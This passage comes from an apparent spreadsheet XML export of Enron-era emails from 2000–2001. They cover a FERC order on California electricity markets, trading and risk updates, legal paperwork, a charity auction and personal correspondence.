from setting the market-clearing price for all bidders; (b) requiring sellers _x000D_
bidding above $150/MWh to report their bids to FERC on a confidential, weekly _x000D_
basis and provide certain cost support; and (c) requiring the ISO and PX to _x000D_
report monthly information on such bids.  The Commission's price mitigation _x000D_
measures would remain in effect through December 31, 2002._x000D_
_x000D_
(5) Declining to order retroactive refunds for the state's ratepayers and _x000D_
utilities, citing insufficient authority to do so, but subjecting sellers to _x000D_
potential refund liability for transactions from October 2, 2000 until _x000D_
December 21, 2002, but no lower than their marginal or opportunity costs, if _x000D_
FERC finds non-competitive behavior._x000D_
_x000D_
(6) Encouraging accelerated state siting approval and introduction of demand _x000D_
response management programs._x000D_
_x000D_
Separately, the draft order rejected the ISO's request for an extension of _x000D_
its current purchase price cap authority, and the PX's request for price _x000D_
capping authority._x000D_
_x000D_
Commissioner Responses_x000D_
_x000D_
Comm. Herbert reluctantly concurred, noting that his decision may change when _x000D_
a final order is considered based on comments filed or testimony offered at _x000D_
the November 9 meeting.  He stressed that he would have preferred that the _x000D_
order address four areas: (1) eliminate all price controls in California _x000D_
markets; (2) abolish the single price auction entirely; (3) terminate the _x000D_
"buy and sell" mandate in the PX; and (4) direct the ISO to address a long _x000D_
list of cited problems in its January 2001 RTO filing, rather than having the _x000D_
Commission prescribe specific remedies._x000D_
_x000D_
Hebert stated that while he was opposed in principle to the "soft cap" _x000D_
concept, if one had to be adopted, then the soft cap should increase _x000D_
incrementally increase over time at specific pre-announced dates.  He _x000D_
believes that this would serve to both encourage greater investment in _x000D_
facilities and additional forward contracting as well as provide an incentive _x000D_
for California regulators to address market design and other flaws.  Also, he _x000D_
would not have disbanded the stakeholder governing boards at this time, but _x000D_
allow the ISO and PX to address this issue in their January 2001 RTO _x000D_
filings.  In addition, he would not dictate risk management methods, _x000D_
preferring instead that market participants determine appropriate actions on _x000D_
their own.  Finally, he advised Californians not to be so environmentally _x000D_
focused that they do not realize their tremendous need for generation _x000D_
capacity._x000D_
_x000D_
Comm. Breathitt stated her approval of the Order while warning that FERC _x000D_
cannot allow the events of this past summer to reverse or slow the progress _x000D_
towards open and competitive markets.  She noted that it was the Commission's _x000D_
job to guide the market to self-correct and not to conduct "command and _x000D_
control."  She also commended the managers of the ISO and PX, saying that _x000D_
they have performed admirably.  However, she noted she is awaiting comments _x000D_
on the single price auction remedy and its accompanying confidential _x000D_
reporting requirements._x000D_
_x000D_
Comm. Massey concurred, but emphasized that he advocates a more aggressive _x000D_
approach.  He feels that the Congress has "put its thumb on the scale" in the _x000D_
Federal Power Act to protect consumers.  Stating that prices will continue to _x000D_
be unreasonable in the future, he believes that this Order moves in the right _x000D_
direction, by proposing solutions to identified problems such as an over _x000D_
reliance on the spot market, lack of demand response, the need to _x000D_
reconstitute governance of the ISO and PX and the elimination of the buy/sell _x000D_
mandate.  Comm. Massey specifically called for comments regarding whether the _x000D_
$150/MWh soft cap went far enough, whether FERC has the legal authority to _x000D_
issue refunds and to determine whether there should be a requirement for a _x000D_
certain percentage of forward contracting to hedge against the spot market _x000D_
price volatility._x000D_
_x000D_
Finally, Chairman Hoecker stated his strong support of the Order, but noted _x000D_
that this is "no time to pull punches."  He emphasized that the Commission _x000D_
needed frank comments from the industry.  He echoed Comm. Breathitt's warning _x000D_
that competition is at risk and that they needed to get the markets back on _x000D_
track.  Noting that the Commission lacked authority to order refunds, he _x000D_
stated that the responsibility rests with Congress.  Addressing _x000D_
jurisdictional issues, he stated that siting problems encountered at the _x000D_
state level are slowing the "meandering transition" to competition.  He feels _x000D_
that the state of California and FERC need to work together to resolve these _x000D_
problems and that FERC is not attempting to usurp power.  Rather, California _x000D_
is part of a broader interstate market and is dependent on the western region _x000D_
for reliable energy, thus placing the burden on federal action to make things _x000D_
work, Hoecker maintained.  The Chairman also said that the Commission will _x000D_
fully investigate and act upon complaints of market power abuse or further _x000D_
evidence provided by staff's ongoing investigation._x000D_
_x000D_
If you have any questions or comments, please call Jack Cashin at _x000D_
202/508-5499._x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 15:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Final draft/letter</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks.  As you know, I'm in the negotiations.  It's the best chance there =_x000D_
is to 1) get a real market and 2) keep Edison out of bankruptcy.  Whether C=_x000D_
alifornia can execute on it is another story.  But we're trying damned hard=_x000D_
 to make it happen.  IEP should support it.  Anything that you can do with =_x000D_
Jan would be useful and appreciated._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09David Parquet@ECT 07/05/2001 12:12 PM =09   To: Jeff Dasovich/NA/Enron@E=_x000D_
nron  cc:   Subject: Final draft/letter=09_x000D_
_x000D_
_x000D_
_x000D_
I did not see you on the distribution.  Comments?_x000D_
_x000D_
----- Forwarded by David Parquet/SF/ECT on 07/05/2001 10:12 AM -----_x000D_
_x000D_
_x000D_
=09"Jan Smutny-Jones" &lt;smutny@iepa.com&gt; 06/28/2001 10:58 AM Please respond =_x000D_
to smutny =09   To: "'Alex Sugaoka (E-mail)'" &lt;alex.sugaoka@uaecorp.com&gt;, "=_x000D_
'Bill Woods (E-mail)'" &lt;billw@calpine.com&gt;, "'Bob Ellery (E-mail)'" &lt;beller=_x000D_
y@spi-ind.com&gt;, "'Bob Escalante (E-mail)'" &lt;rescalante@riobravo-gm.com&gt;, "'=_x000D_
Bob Gates (E-mail)'" &lt;bob.gates@enron.com&gt;, "'Carolyn A Baker (E-mail)'" &lt;c=_x000D_
abaker@duke-energy.com&gt;, "Charles Linthicum (E-mail)" &lt;charles.linthicum@po=_x000D_
wersrc.com&gt;, "'Cody Carter (E-mail)'" &lt;cody.carter@williams.com&gt;, "'Curt Ha=_x000D_
tton (E-mail)'" &lt;Curt.Hatton@gen.pge.com&gt;, "'Curtis Kebler (E-mail)'" &lt;curt=_x000D_
is_l_kebler@reliantenergy.com&gt;, "'David Parquet'" &lt;david.parquet@enron.com&gt;=_x000D_
, "'Dean Gosselin (E-mail)'" &lt;dean_gosselin@fpl.com&gt;, "'Douglas Kerner (E-m=_x000D_
ail)'" &lt;dkk@eslawfirm.com&gt;, "'Duane Nelsen (E-mail)'" &lt;dnelsen@gwfpower.com=_x000D_
&gt;, "'Ed Tomeo (E-mail)'" &lt;ed.tomeo@uaecorp.com&gt;, "'Eileen Koch (E-mail)'" &lt;=_x000D_
eileenk@calpine.com&gt;, "'Eric Eisenman (E-mail)'" &lt;eric.eisenman@gen.pge.com=_x000D_
&gt;, "'Frank DeRosa (E-mail)'" &lt;frank.derosa@gen.pge.com&gt;, "'Greg Blue (E-mai=_x000D_
l)'" &lt;gtbl@dynegy.com&gt;, "'Hap Boyd (E-mail)'" &lt;Hap_Boyd@enron.com&gt;, "'Hawks=_x000D_
 Jack (E-mail)'" &lt;jack.hawks@gen.pge.com&gt;, "'Jack Pigott (E-mail)'" &lt;jackp@=_x000D_
calpine.com&gt;, "'Jim Willey (E-mail)'" &lt;elliottsa@earthlink.net&gt;, "'Joe Grec=_x000D_
o (E-mail)'" &lt;jgreco@caithnessenergy.com&gt;, "'Joe Ronan (E-mail)'" &lt;joer@cal=_x000D_
pine.com&gt;, "'John Stout (E-mail)'" &lt;john_h_stout@reliantenergy.com&gt;, "'Jona=_x000D_
than Weisgall (E-mail)'" &lt;jweisgall@aol.com&gt;, "Kate Castillo (E-mail)" &lt;CCa=_x000D_
stillo@riobravo-gm.com&gt;, "'Kelly Lloyd (E-mail)'" &lt;kellyl@enxco.com&gt;, "'Ken=_x000D_
 Hoffman (E-mail)'" &lt;khoffman@caithnessenergy.com&gt;, "'Kent Fickett (E-mail)=_x000D_
'" &lt;kfickett@usgen.com&gt;, "'Kent Palmerton'" &lt;kent.palmerton@williams.com&gt;, =_x000D_
"'Lynn Lednicky (E-mail)'" &lt;lynn.a.lednicky@dynegy.com&gt;, "Mark Fillinger (E=_x000D_
-mail)" &lt;mark.fillinger@enron.com&gt;, "Marty McFadden (E-mail)" &lt;mmcfadden@co=_x000D_
vantaenergy.com&gt;, "Paul Desrochers (E-mail)" &lt;pdesrochers@thermoecotek.com&gt;=_x000D_
, "Paula Soos (E-mail)" &lt;psoos@covantaenergy.com&gt;, "'Randy Hickok (E-mail)'=_x000D_
" &lt;rjhickok@duke-energy.com&gt;, "'Roger Pelote (E-mail)'" &lt;roger.pelote@willi=_x000D_
ams.com&gt;, "'Ross Ain (E-mail)'" &lt;ain@worldnet.att.net&gt;, "Scott Sadler (E-ma=_x000D_
il)" &lt;sadlersa@earthlink.net&gt;, "'Stephanie Newell (E-mail)'" &lt;stephanie-new=_x000D_
ell@reliantenergy.com&gt;, "Steve Iliff (E-mail)" &lt;siliff@riobravo-gm.com&gt;, "'=_x000D_
Steve Ponder (E-mail)'" &lt;steve_ponder@fpl.com&gt;, "'Susan J Mara (E-mail)'" &lt;=_x000D_
smara@enron.com&gt;, "Thomas R. McMorrow (E-mail)" &lt;tmcmorrow@manatt.com&gt;, "'T=_x000D_
ony Wetzel (E-mail)'" &lt;twetzel@thermoecotek.com&gt;, "William Carlson (E-mail)=_x000D_
" &lt;wcarlson@wm.com&gt;, "William Hall (E-mail)" &lt;wfhall2@duke-energy.com&gt;  cc:=_x000D_
 "Steven Kelly (E-mail)" &lt;steven@iepa.com&gt;, "Andy Brown (E-mail)" &lt;abb@esla=_x000D_
wfirm.com&gt;, "'Carol Hudson (E-mail)'" &lt;carol@iepa.com&gt;, "'Jan Smutny-Jones =_x000D_
(E-mail)'" &lt;smutny@iepa.com&gt;, "Jean Munoz (E-mail)" &lt;jmunoz@mcnallytemple.c=_x000D_
om&gt;, "'Katie Kaplan (E-mail)'" &lt;kaplan@iepa.com&gt;, "Sandra Moseley (E-mail)"=_x000D_
 &lt;sandra@iepa.com&gt;  Subject: Final draft/letter=09_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The attached is the final product of the discussions which have been_x000D_
occurring between the various consumer groups attempting to keep Edsion_x000D_
solvent while retaining some potential for direct access.  IEP has_x000D_
participated in some of these discussions._x000D_
IEP is being asked to sign this letter. It is time sensitive because of_x000D_
pending PUC action on Direct Access._x000D_
_x000D_
Therefore I am calling an emergency Board Call for TODAY THURSDAY 6/28/01_x000D_
3:00 pm PST._x000D_
_x000D_
Call-in number: 1-877-288-4427_x000D_
Participant Code: 934948_x000D_
_x000D_
_x000D_
 - CLEAN Draft Issues Outline 6-27-01.doc=20_x000D_
 - Cover Letter.doc=20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 21 Apr 2001 08:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>share price data</t>
  </si>
  <si>
    <t>FYI:  Here's monthly share price date over last five years for:  OAT, KO, _x000D_
PEP, S&amp;P, BRKA, BRKB.  (I included Berkshire in the event we want to say _x000D_
something about Buffet's recent performance.  I've attached another file with _x000D_
a chart that shows Buffet versus S&amp;P for 1, 3 and 5 year performance)  _x000D_
_x000D_
For the OAT, KO, PEP, etc. file, calculated year-on-year performance _x000D_
(excluding dividends).  Also, you'll see highlighted in yellow month-on-month _x000D_
performance for 2001.  But ain't done any chart for that stuff yet.  Thought _x000D_
we'd discuss first._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 18:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Carryovers into 2001</t>
  </si>
  <si>
    <t xml:space="preserve">I am not speaking of capital, only O &amp; M.  I really need a list of all items on the balance sheet for reserves, def. charges etc.  I need to know when they will turn, what they are for and if they are in your 2001 plan. _x000D_
_x000D_
thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Keiser_x000D_
01/30/2001 11:50 AM_x000D_
To:	Tracy Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Carryovers into 2001_x000D_
_x000D_
In the 2001 Capital Budget there are no true carryovers._x000D_
_x000D_
However, in reality there are dollars that need to be spent on 2000 projects that will finish in 2001.  These will have to be funded with management approval by other identified 2001 projects that won't happen._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 09:35:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: crude buying</t>
  </si>
  <si>
    <t>if cash/futures is 10-15 then oct will have a very weak settle._x000D_
_x000D_
they are trying to use the regular access system on the internet which was supposed to come out two weeks ago but they delayed because the firewalls and security issues hadnt been solved_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fraser, Jennifer  _x000D_
Sent:	Thursday, September 13, 2001 11:31 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
okay i guess i misunderstood the press release or the bubbleheads on cnbc--so they will be using the regular access electronic system for the 2 shortened sessions..and what do you think about 1-current cash to futs 20ng price in general--thanks_x000D_
jf_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Thursday, September 13, 2001 11:25 AM_x000D_
To:	Fraser, Jennifer_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
the nymex is so technologically incompetent that they have no idea.   after working on it for 18 months they're trying to buy are technology now_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fraser, Jennifer  _x000D_
Sent:	Thursday, September 13, 2001 11:21 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
oops enymex_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Thursday, September 13, 2001 11:20 AM_x000D_
To:	Fraser, Jennifer_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
_x000D_
huh?_x000D_
 -----Original Message-----_x000D_
From: 	Fraser, Jennifer  _x000D_
Sent:	Thursday, September 13, 2001 11:19 AM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
how does nymex work?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Thursday, September 13, 2001 11:11 AM_x000D_
To:	Fraser, Jennifer_x000D_
Subject:	RE: crude buying_x000D_
_x000D_
all I hear is that all the funds are going to get squeezed as soon as the nymex opens.  fuck, i don't know, but I'm not going get long crude hoping to squeeze the funds.  lost that game too many times._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fraser, Jennifer  _x000D_
Sent:	Thursday, September 13, 2001 11:04 AM_x000D_
To:	Arnold, John_x000D_
Subject:	crude buying_x000D_
_x000D_
nice move--stats will be very very bullish---especially padd I and II--expect big draws._x000D_
jf</t>
  </si>
  <si>
    <t>Sun, 22 Apr 2001 13:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Online Auction and Raffle benefiting March of Dimes</t>
  </si>
  <si>
    <t>Here is your chance to buy or win great prizes AND benefit a great cause - _x000D_
March of Dimes._x000D_
_x000D_
Online Auction_x000D_
Wednesday, April 25 and Thursday, April 26_x000D_
Auction opens Wednesday - 9:00 a.m. and closes Thursday - 4:00 p.m._x000D_
_x000D_
Auction items include:_x000D_
? Astros suite_x000D_
? "Primo" parking spot_x000D_
? Astros tickets_x000D_
? Dinner for two_x000D_
? Massage and many more items._x000D_
_x000D_
_x000D_
To make your bid, click on: _x000D_
http://my.home.enron.com  or_x000D_
http://ecweb05e.enron.net/apps/auction.nsf/_x000D_
_x000D_
High bidders will be notified on Friday, April 27._x000D_
Visa, MasterCard, and American Express accepted._x000D_
_x000D_
_x000D_
Raffle Drawing_x000D_
Buy your tickets Wednesday, April 25 and Thursday, April 26, upstairs outside _x000D_
of the Energizer from 11:00 a.m. - 1:00 p.m._x000D_
On Friday, April 27, buy your tickets at the Big E Cafe from 11:00 a.m. - _x000D_
1:00 p.m. _x000D_
_x000D_
Tickets: 1 for $5, 3 for $10, and 7 for $20_x000D_
_x000D_
Raffle Prizes include:_x000D_
? Two roundtrip Continental Airlines in the 48 contiguous states_x000D_
? Compaq PA - Personal Audio Player_x000D_
? Manicure and Pedicure at Urban Retreat_x000D_
? Astros tickets and many more._x000D_
_x000D_
Raffle drawing will be held on Friday, April 27 at 2:00 p.m. Winners will be _x000D_
notified on Friday afternoon._x000D_
_x000D_
Don't miss this opportunity to contribute to the March of Dimes.</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 07:15:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Executed Assignments</t>
  </si>
  <si>
    <t>Marie -_x000D_
_x000D_
I was gone to a seminar both Thursday and Friday - now back to work.  I only_x000D_
received United Oil's assignments back - and on Wednesday I left a message_x000D_
for both Sempra and Dynegy.  I will chase those today._x000D_
_x000D_
Do you want for me to send UOM 's paperwork before I get the others?  I can_x000D_
do that if that's your preference.  Let me know please._x000D_
_x000D_
Regards,_x000D_
Roeline_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Heard, Marie [SMTP:Marie.Heard@ENRON.com]_x000D_
&gt; Sent:	Friday, October 19, 2001 9:52 AM_x000D_
&gt; To:	hudsonr@teai.com_x000D_
&gt; Subject:	Executed Assignments_x000D_
&gt;_x000D_
&gt; Hi, Roeline!_x000D_
&gt;_x000D_
&gt; Just checking on the status of the original assignments I forwarded to_x000D_
&gt; you for execution.  Have you received them back from UOM, Dynegy and_x000D_
&gt; Sempra?  If so, will you send me an original of each for my files?_x000D_
&gt;_x000D_
&gt; Hope all is going well and that you have a great weekend._x000D_
&gt;_x000D_
&gt; Marie_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt; This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt; and may contain confidential and privileged material for the sole use of_x000D_
&gt; the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
&gt; others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt; authorized to receive for the recipient), please contact the sender or_x000D_
&gt; reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete all copies of the message. This e-mail (and any attachments hereto)_x000D_
&gt; are not intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence a binding and enforceable contract between Enron Corp. (or any of_x000D_
&gt; its affiliates) and the intended recipient or any other party, and may not_x000D_
&gt; be relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise. Thank you._x000D_
&gt; **********************************************************************</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 08:54:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Prime Brokerage Clearance Services Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Please forward your email to the RAC group requesting the opening of this account.  Thanks. Sara_x000D_
_x000D_
-----Original Message-----_x000D_
From: Doukas, Tom _x000D_
Sent: Tuesday, October 02, 2001 11:34 AM_x000D_
To: Shackleton, Sara_x000D_
Cc: Heard, Marie_x000D_
Subject: FW: Prime Brokerage Clearance Services Agreement_x000D_
_x000D_
_x000D_
I have another one for you guys.  I do not anticipate any urgency on this, but would still like it out of the way._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom_x000D_
_x000D_
-----Original Message-----_x000D_
From: Grice, Regan [mailto:regan.grice@funb.com]_x000D_
Sent: Tuesday, October 02, 2001 11:10 AM_x000D_
To: Doukas, Tom_x000D_
Subject: Prime Brokerage Clearance Services Agreement_x000D_
_x000D_
_x000D_
Mr. Doukas:_x000D_
_x000D_
On September 27, we opened a prime brokerage account in the name Enron_x000D_
Credit Inc. Bear Stearns is acting as Prime Broker on this account, and_x000D_
First Union Securities, Inc. is executing your securities. The SEC requires_x000D_
the Clearing Broker (us) to have the attached agreement on file for our_x000D_
prime brokerage clients._x000D_
_x000D_
If you would be so kind as to have this agreement signed, I would greatly_x000D_
appreciate it. If you have any questions, you can call me at 704-593-7024._x000D_
Once it is completed, it can be faxed back to my attention at 704-593-7032._x000D_
_x000D_
Thank you and best regards,_x000D_
_x000D_
_x000D_
Regan Grice_x000D_
First Union Capital Markets, Documentation_x000D_
Phone: 1-800-735-1470 or 704-593-7278_x000D_
Fax: 704-593-7032_x000D_
	_x000D_
_x000D_
 &lt;&lt;Enron Credit 151.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 05:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wise old women at work</t>
  </si>
  <si>
    <t>I tell ya Mo, it's weird._x000D_
_x000D_
                   HOROSCOPE:      Weekly  _x000D_
_x000D_
_x000D_
_x000D_
                   For September 25-October 1: Better_x000D_
                   communication is indicated this week. Issues_x000D_
                   that have bogged you down are effectively_x000D_
                   addressed. Don't get up and leave until you get_x000D_
                   every answer you need. Be direct and honest,_x000D_
                   without losing your temper. Even if others_x000D_
                   misbehave, continue pursuing what you believe_x000D_
                   is right. An agreement is either out of balance or_x000D_
                   no longer desirable. You CAN make_x000D_
                   improvements to existing paperwork, contracts,_x000D_
                   and agreements -- as long as you remain_x000D_
                   friendly, respectful, and well-prepared. There_x000D_
                   can be no hostility on your end, or negotiations_x000D_
                   will break down. _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Emily Hillegeist" &lt;ehillegeist@hotmail.com&gt;                           _x000D_
09/25/2000 05:26 AM_x000D_
	_x000D_
	_x000D_
_x000D_
To: Susan.M.Scott@enron.com_x000D_
cc:  _x000D_
Subject: Re: You guys are not going to believe this..._x000D_
_x000D_
_x000D_
puh-lease!   i know i just emailed you, but i had to respond.  sometimes_x000D_
it's hard for me to email back in a timely manner since, w/o a laptop, i_x000D_
only have computer mon-thurs.  sue, PROMISE me you WILL not sacrifice your_x000D_
integrity and allow him to weasle in just b/c he has a guilty conscience._x000D_
i'm pretty sure you won't, but i'm just imagining as i sit here the stories_x000D_
your mom and dad have to tell.....and that's just the tip of the iceberg!i'm_x000D_
a firm believer in the one strike and you're out thoery, and of course,_x000D_
based on a, his behavior in the last few weeks, b., the sage words of his_x000D_
'trusty' friend kevin, who DID give your parents the time of day, c., his_x000D_
behavior steak nite, and d., HIS BEHAVIOR!!!!- i'd say he's been benched.  i_x000D_
wouldn't rule out an 'explanation beer', but i thinks it's time to lower the_x000D_
blow, so to speak, cut your losses, and run like hell...._x000D_
e_x000D_
  _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Emily Hillegeist" &lt;ehillegeist@hotmail.com&gt;                           _x000D_
09/25/2000 04:49 AM_x000D_
	_x000D_
	_x000D_
_x000D_
To: Susan.M.Scott@enron.com_x000D_
cc:  _x000D_
Subject: Re: We have closure! (well, sort-of)_x000D_
_x000D_
_x000D_
i have to admit, when i saw the copyline for this, i began to panic.  i_x000D_
pictured you in a drunken about- to-go-over the edge rage....and then ted_x000D_
stumbling onto the scene, and you unloading.  however, in lieu of the facts,_x000D_
i'd say this was an unequivicable 'victory', if such a word can be used...._x000D_
i think it's fair to say that you ended up w/ more on your side of the_x000D_
tug-of-war rope, so to speak.  and although it's frustrating to see what_x000D_
once seemed to be 'potential' turn into shit, it's easier to walk away- at_x000D_
least i'd imagine it to be.  sounds like you're going to have a whirl-wind_x000D_
trip- guess enron only can open the gates of hell to let you out for brief_x000D_
blocks of time......isn't that kind of like the myth about persephone_x000D_
escaping from hades......?  will try to plan a suitable agenda- still in_x000D_
ther 'dazed and confused' period- been more concerned w/ where i can find_x000D_
trash bags than hopping bars so far, but will try to fine tune my skills in_x000D_
the time remaining- must go to class, but will write more later.  hate to_x000D_
say it, but you prob. will be saddled w/ a care package for me from mom-_x000D_
will try to make it in the 80lbs or less range....</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 09:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monica.lande@enron.com', 'matt.motley@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'sean.crandall@enron.com', 'valarie.sabo@enron.com', 'bill.iii@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'fran.chang@enron.com', 'jeremy.morris@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com', 'carla.hoffman@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>Daily EOL Summary 2/28</t>
  </si>
  <si>
    <t xml:space="preserve">Beginning tomorrow this report will contain Inter-Continental Exchange (ICE)  _x000D_
trade numbers and volumes, in addition to EOL and brokered deal information. _x000D_
Please look for that information at the beginning of the e-mail. Also note _x000D_
that the ICE data is released one day later, so it will not correlate _x000D_
directly to the EOL data below it. (i.e. Daily EOL Summary 3/1 will include _x000D_
ICE data from 2/28) Enjoy..._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 07:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'sheila.tweed@enron.com', 'lance.schuler@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'jeffrey.hodge@enron.com'})</t>
  </si>
  <si>
    <t>Monthly Report</t>
  </si>
  <si>
    <t xml:space="preserve">It is time to update the Monthly Report Mark Haedicke send to Jim Derrick.  _x000D_
Please use a hard copy of the attached November report to mark changes for _x000D_
transactions as of today._x000D_
_x000D_
Give your hard copy changes to Dina Snow by the end of the day Wednesday, _x000D_
December 13._x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 02:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>GOT GAS?</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 23:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.hachen@enron.com', 'rick.buy@enron.com', 'david.gorte@enron.com'})</t>
  </si>
  <si>
    <t>EES Update - Task Force Issues</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Michael Tribolet/Corp/Enron on 12/13/2000 _x000D_
07:10 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Vladimir Gorny @ ECT                           12/12/2000 06:28 PM_x000D_
	_x000D_
_x000D_
To: Ted Murphy/HOU/ECT@ECT, Michael Tribolet/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: EES Update - Task Force Issues_x000D_
_x000D_
1. EES P&amp;L Recap - Last 5-days:_x000D_
_x000D_
  Trading P&amp;L   Total P&amp;L (included origination, prudency changes, etc.)_x000D_
 12/5 Loss of 31.9 million  Loss of 27.3 million_x000D_
 12/6 Loss of 30.1 million  Loss of 28.2 million_x000D_
 12/7 Loss of 16.4 million  Loss of 16.2 million_x000D_
 12/8 Loss of  28.6 million  Loss of 28.7 million_x000D_
 12/11 Loss of  16.8 million  Loss of 23.5 million_x000D_
 12/12 likely more losses (~$25 million)_x000D_
_x000D_
 Total Loss of  123.8 million  Loss of 123.9 million_x000D_
_x000D_
As of 12/11 EES VaR was $6.7 MM_x000D_
_x000D_
2. Hedging Positions:_x000D_
_x000D_
On Sunday night, December 10th, Tim Belden and John Lavorato have offered Don _x000D_
Black to flatten EES 2001 West positions at a given price (I suspect in the _x000D_
range of $100 million). EES declined._x000D_
_x000D_
In the last few days Belden has helped EES flatten their Jan/01 positions and _x000D_
is currently working on hedging remaining Q1/01 exposure. In Belden's view, _x000D_
it is going to be rather difficult to substantially lay-off EES exposure to _x000D_
third parties in the next few weeks. Liquidity has completely dried-up, most _x000D_
trading counterparties have flattened their books and are not willing to take _x000D_
on a lot of exposure. Nonetheless, EES is trying hard to hedge their exposure _x000D_
and have been taking off positions (2001 NP/COB Spread) in the last few days _x000D_
and will continue to do so as liquidity permits._x000D_
_x000D_
3. Deal Analysis - the following deals are expected to close before year-end:_x000D_
_x000D_
  VaR  Incremental VaR_x000D_
Eli Lilly  $1.57 MM TBD by Minal_x000D_
Pilkington $0.7 MM TBD by Minal_x000D_
ECS  $1.0 MM TBD by Minal_x000D_
CHE  TBD by Minal TBD by Minal_x000D_
JC Penney waiting for positions_x000D_
_x000D_
I have asked Dennis to estimate how much of the market risk embedded in these _x000D_
deals they will be able to hedge in the market or through ENA. Then, we will _x000D_
be able to determine whether EES requires a temporary VaR increase and _x000D_
process a request, accordingly (the $2 million allocation expires after _x000D_
12/15)._x000D_
_x000D_
JC Penney is estimated to be the largest deal ever executed by EES with 6300 _x000D_
sites, behind some 200 utilities, over 240 models and significant positions. _x000D_
It is my understanding that current deal NPV is estimated at $10 million, _x000D_
before credit reserve. Given that this deal will add significant incremental _x000D_
market, credit and EAM (rather iffy engineers' estimates) risks to the _x000D_
portfolio, I suggest to discuss deal economics with the deal team before _x000D_
committing more resources to it._x000D_
_x000D_
Vlady._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised Headcount Information</t>
  </si>
  <si>
    <t xml:space="preserve">Rick - _x000D_
_x000D_
based on our meeting last week and budget savings information received so far _x000D_
attached is the revised headcount information for your review and comment_x000D_
_x000D_
I have budget savings information from everyone except Jean Ryall and hope to _x000D_
get that information tonight; once I have all the numbers I'll send something _x000D_
to you_x000D_
_x000D_
I hope to meet with Sue Nord today to talk to her about the cost savings for _x000D_
EBS G/A to make sure I understand what numbers she is offering_x000D_
_x000D_
_x000D_
also - I asked Ginger to put me on your calendar for Friday afternoon _x000D_
(4:30-5:00) to go over headcount, travel policy, phone policy, budget _x000D_
savings, etc.; would you like me to work on the Europe, Asia and Australia _x000D_
budgets since those are now under your control; if so, are we looking for _x000D_
savings opportunities there as well_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
</t>
  </si>
  <si>
